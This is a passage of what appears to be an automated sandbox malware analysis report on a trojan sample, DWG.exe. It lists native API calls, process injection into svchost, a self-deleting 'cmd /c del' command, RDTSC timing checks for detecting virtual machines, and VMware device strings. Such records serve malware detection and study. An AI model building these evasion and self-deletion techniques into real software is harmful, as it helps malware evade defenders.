          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769A00 NtProtectVirtualMemory,10_2_03769A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769A80 NtOpenDirectoryObject,10_2_03769A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769950 NtQueueApcThread,10_2_03769950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037699D0 NtCreateProcessEx,10_2_037699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0376B040 NtSuspendThread,10_2_0376B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769820 NtEnumerateKey,10_2_03769820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037698F0 NtReadVirtualMemory,10_2_037698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037698A0 NtWriteVirtualMemory,10_2_037698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0376A770 NtOpenThread,10_2_0376A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769770 NtSetInformationFile,10_2_03769770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769760 NtOpenProcess,10_2_03769760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769730 NtQueryVirtualMemory,10_2_03769730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0376A710 NtOpenProcessToken,10_2_0376A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037697A0 NtUnmapViewOfSection,10_2_037697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769670 NtQueryInformationProcess,10_2_03769670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769610 NtEnumerateValueKey,10_2_03769610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769560 NtWriteFile,10_2_03769560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0376AD30 NtSetContextThread,10_2_0376AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769520 NtWaitForSingleObject,10_2_03769520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037695F0 NtQueryInformationFile,10_2_037695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F28690 NtReadFile,10_2_02F28690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F287C0 NtAllocateVirtualMemory,10_2_02F287C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F28710 NtClose,10_2_02F28710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F285E0 NtCreateFile,10_2_02F285E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2883A NtAllocateVirtualMemory,10_2_02F2883A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2868C NtReadFile,10_2_02F2868C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F28632 NtCreateFile,10_2_02F28632
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2870B NtClose,10_2_02F2870B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F285DA NtCreateFile,10_2_02F285DA
          Source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs DWG.exe
          Source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DWG.exe
          Source: DWG.exeVirustotal: Detection: 50%
          Source: DWG.exeReversingLabs: Detection: 37%
          Source: DWG.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DWG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DWG.exe 'C:\Users\user\Desktop\DWG.exe'
          Source: C:\Users\user\Desktop\DWG.exeProcess created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DWG.exeProcess created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\DWG.exeFile created: C:\Users\user\AppData\Local\Temp\Cielert.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@10/4
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00401593 GetDiskFreeSpaceExA,0_2_00401593
          Source: DWG.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_01
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00448223 FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,0_2_00448223
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: DWG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmp, svchost.exe, 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DWG.exe, svchost.exe
          Source: Binary string: svchost.pdb source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
          Source: Binary string: svchost.pdbUGP source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004352E0 push eax; ret 0_2_0043530E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00461801 push ecx; iretd 0_2_00461833
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043691C push eax; ret 0_2_0043693A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041B822 push eax; ret 5_2_0041B828
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041B82B push eax; ret 5_2_0041B892
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041B88C push eax; ret 5_2_0041B892
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004153DF pushfd ; iretd 5_2_004153E5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004195E8 push eax; retf 5_2_004195EF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00ACD0D1 push ecx; ret 5_2_00ACD0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0377D0D1 push ecx; ret 10_2_0377D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F253DF pushfd ; iretd 10_2_02F253E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2B88C push eax; ret 10_2_02F2B892
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2B822 push eax; ret 10_2_02F2B828
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2B82B push eax; ret 10_2_02F2B892
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2B7D5 push eax; ret 10_2_02F2B828
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F295E8 push eax; retf 10_2_02F295EF
          Source: DWG.exeStatic PE information: section name: .zrjfv
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043E8B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0043E8B9

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del 'C:\Users\user\Desktop\DWG.exe'
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del 'C:\Users\user\Desktop\DWG.exe'Jump to behavior
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0042D406 IsIconic,GetWindowPlacement,GetWindowRect,0_2_0042D406
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00441490 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,0_2_00441490
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00411790 IsIconic,0_2_00411790
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00440CE0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,0_2_00440CE0
          Source: C:\Users\user\Desktop\DWG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\DWG.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DWG.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002F18604 second address: 0000000002F1860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002F1899E second address: 0000000002F189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe TID: 4740Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\user\Desktop\DWG.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00436310 FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,0_2_00436310
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00449B06 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00449B06
          Source: explorer.exe, 00000006.00000000.367292686.000000000EF3D000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.365065099.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000006.00000000.346085496.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.346085496.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000006.00000000.333633264.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}stemRoo
          Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043E8B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0043E8B9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\user\Desktop\DWG.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004592D8 mov ecx, dword ptr fs:[00000030h]0_2_004592D8
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045DA58 mov eax, dword ptr fs:[00000030h]0_2_0045DA58
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045DA68 mov eax, dword ptr fs:[00000030h]0_2_0045DA68
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045DA88 mov eax, dword ptr fs:[00000030h]0_2_0045DA88
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045DB28 mov eax, dword ptr fs:[00000030h]0_2_0045DB28
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045DDF8 mov eax, dword ptr fs:[00000030h]0_2_0045DDF8
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB90AF mov eax, dword ptr fs:[00000030h]5_2_00AB90AF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]5_2_00AA20A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]5_2_00AA20A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]5_2_00AA20A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]5_2_00AA20A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]5_2_00AA20A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]5_2_00AA20A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]5_2_00AAF0BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAF0BF mov eax, dword ptr fs:[00000030h]5_2_00AAF0BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAF0BF mov eax, dword ptr fs:[00000030h]5_2_00AAF0BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A79080 mov eax, dword ptr fs:[00000030h]5_2_00A79080
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF3884 mov eax, dword ptr fs:[00000030h]5_2_00AF3884
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF3884 mov eax, dword ptr fs:[00000030h]5_2_00AF3884
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h]5_2_00A740E1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h]5_2_00A740E1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h]5_2_00A740E1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A758EC mov eax, dword ptr fs:[00000030h]5_2_00A758EC
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9B8E4 mov eax, dword ptr fs:[00000030h]5_2_00A9B8E4
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9B8E4 mov eax, dword ptr fs:[00000030h]5_2_00A9B8E4
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]5_2_00B0B8D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]5_2_00B0B8D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]5_2_00B0B8D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]5_2_00B0B8D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]5_2_00B0B8D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]5_2_00B0B8D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h]5_2_00A8B02A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h]5_2_00A8B02A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h]5_2_00A8B02A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h]5_2_00A8B02A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]5_2_00AA002D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]5_2_00AA002D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]5_2_00AA002D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]5_2_00AA002D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]5_2_00AA002D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]5_2_00A9A830
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]5_2_00A9A830
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]5_2_00A9A830
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]5_2_00A9A830
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B44015 mov eax, dword ptr fs:[00000030h]5_2_00B44015
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B44015 mov eax, dword ptr fs:[00000030h]5_2_00B44015
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h]5_2_00AF7016
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h]5_2_00AF7016
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h]5_2_00AF7016
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B32073 mov eax, dword ptr fs:[00000030h]5_2_00B32073
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B41074 mov eax, dword ptr fs:[00000030h]5_2_00B41074
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A90050 mov eax, dword ptr fs:[00000030h]5_2_00A90050
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A90050 mov eax, dword ptr fs:[00000030h]5_2_00A90050
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF69A6 mov eax, dword ptr fs:[00000030h]5_2_00AF69A6
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA61A0 mov eax, dword ptr fs:[00000030h]5_2_00AA61A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA61A0 mov eax, dword ptr fs:[00000030h]5_2_00AA61A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h]5_2_00AF51BE
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h]5_2_00AF51BE
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h]5_2_00AF51BE
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h]5_2_00AF51BE
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h]5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h]5_2_00B349A4
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h]5_2_00B349A4
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h]5_2_00B349A4
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h]5_2_00B349A4
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9C182 mov eax, dword ptr fs:[00000030h]5_2_00A9C182
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA185 mov eax, dword ptr fs:[00000030h]5_2_00AAA185
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2990 mov eax, dword ptr fs:[00000030h]5_2_00AA2990
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]5_2_00A7B1E1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]5_2_00A7B1E1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]5_2_00A7B1E1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B041E8 mov eax, dword ptr fs:[00000030h]5_2_00B041E8
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h]5_2_00A94120
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h]5_2_00A94120
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h]5_2_00A94120
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h]5_2_00A94120
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A94120 mov ecx, dword ptr fs:[00000030h]5_2_00A94120
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA513A mov eax, dword ptr fs:[00000030h]5_2_00AA513A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA513A mov eax, dword ptr fs:[00000030h]5_2_00AA513A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h]5_2_00A79100
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h]5_2_00A79100
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h]5_2_00A79100
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7C962 mov eax, dword ptr fs:[00000030h]5_2_00A7C962
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7B171 mov eax, dword ptr fs:[00000030h]5_2_00A7B171
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7B171 mov eax, dword ptr fs:[00000030h]5_2_00A7B171
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9B944 mov eax, dword ptr fs:[00000030h]5_2_00A9B944
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9B944 mov eax, dword ptr fs:[00000030h]5_2_00A9B944
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]5_2_00A752A5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]5_2_00A752A5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]5_2_00A752A5
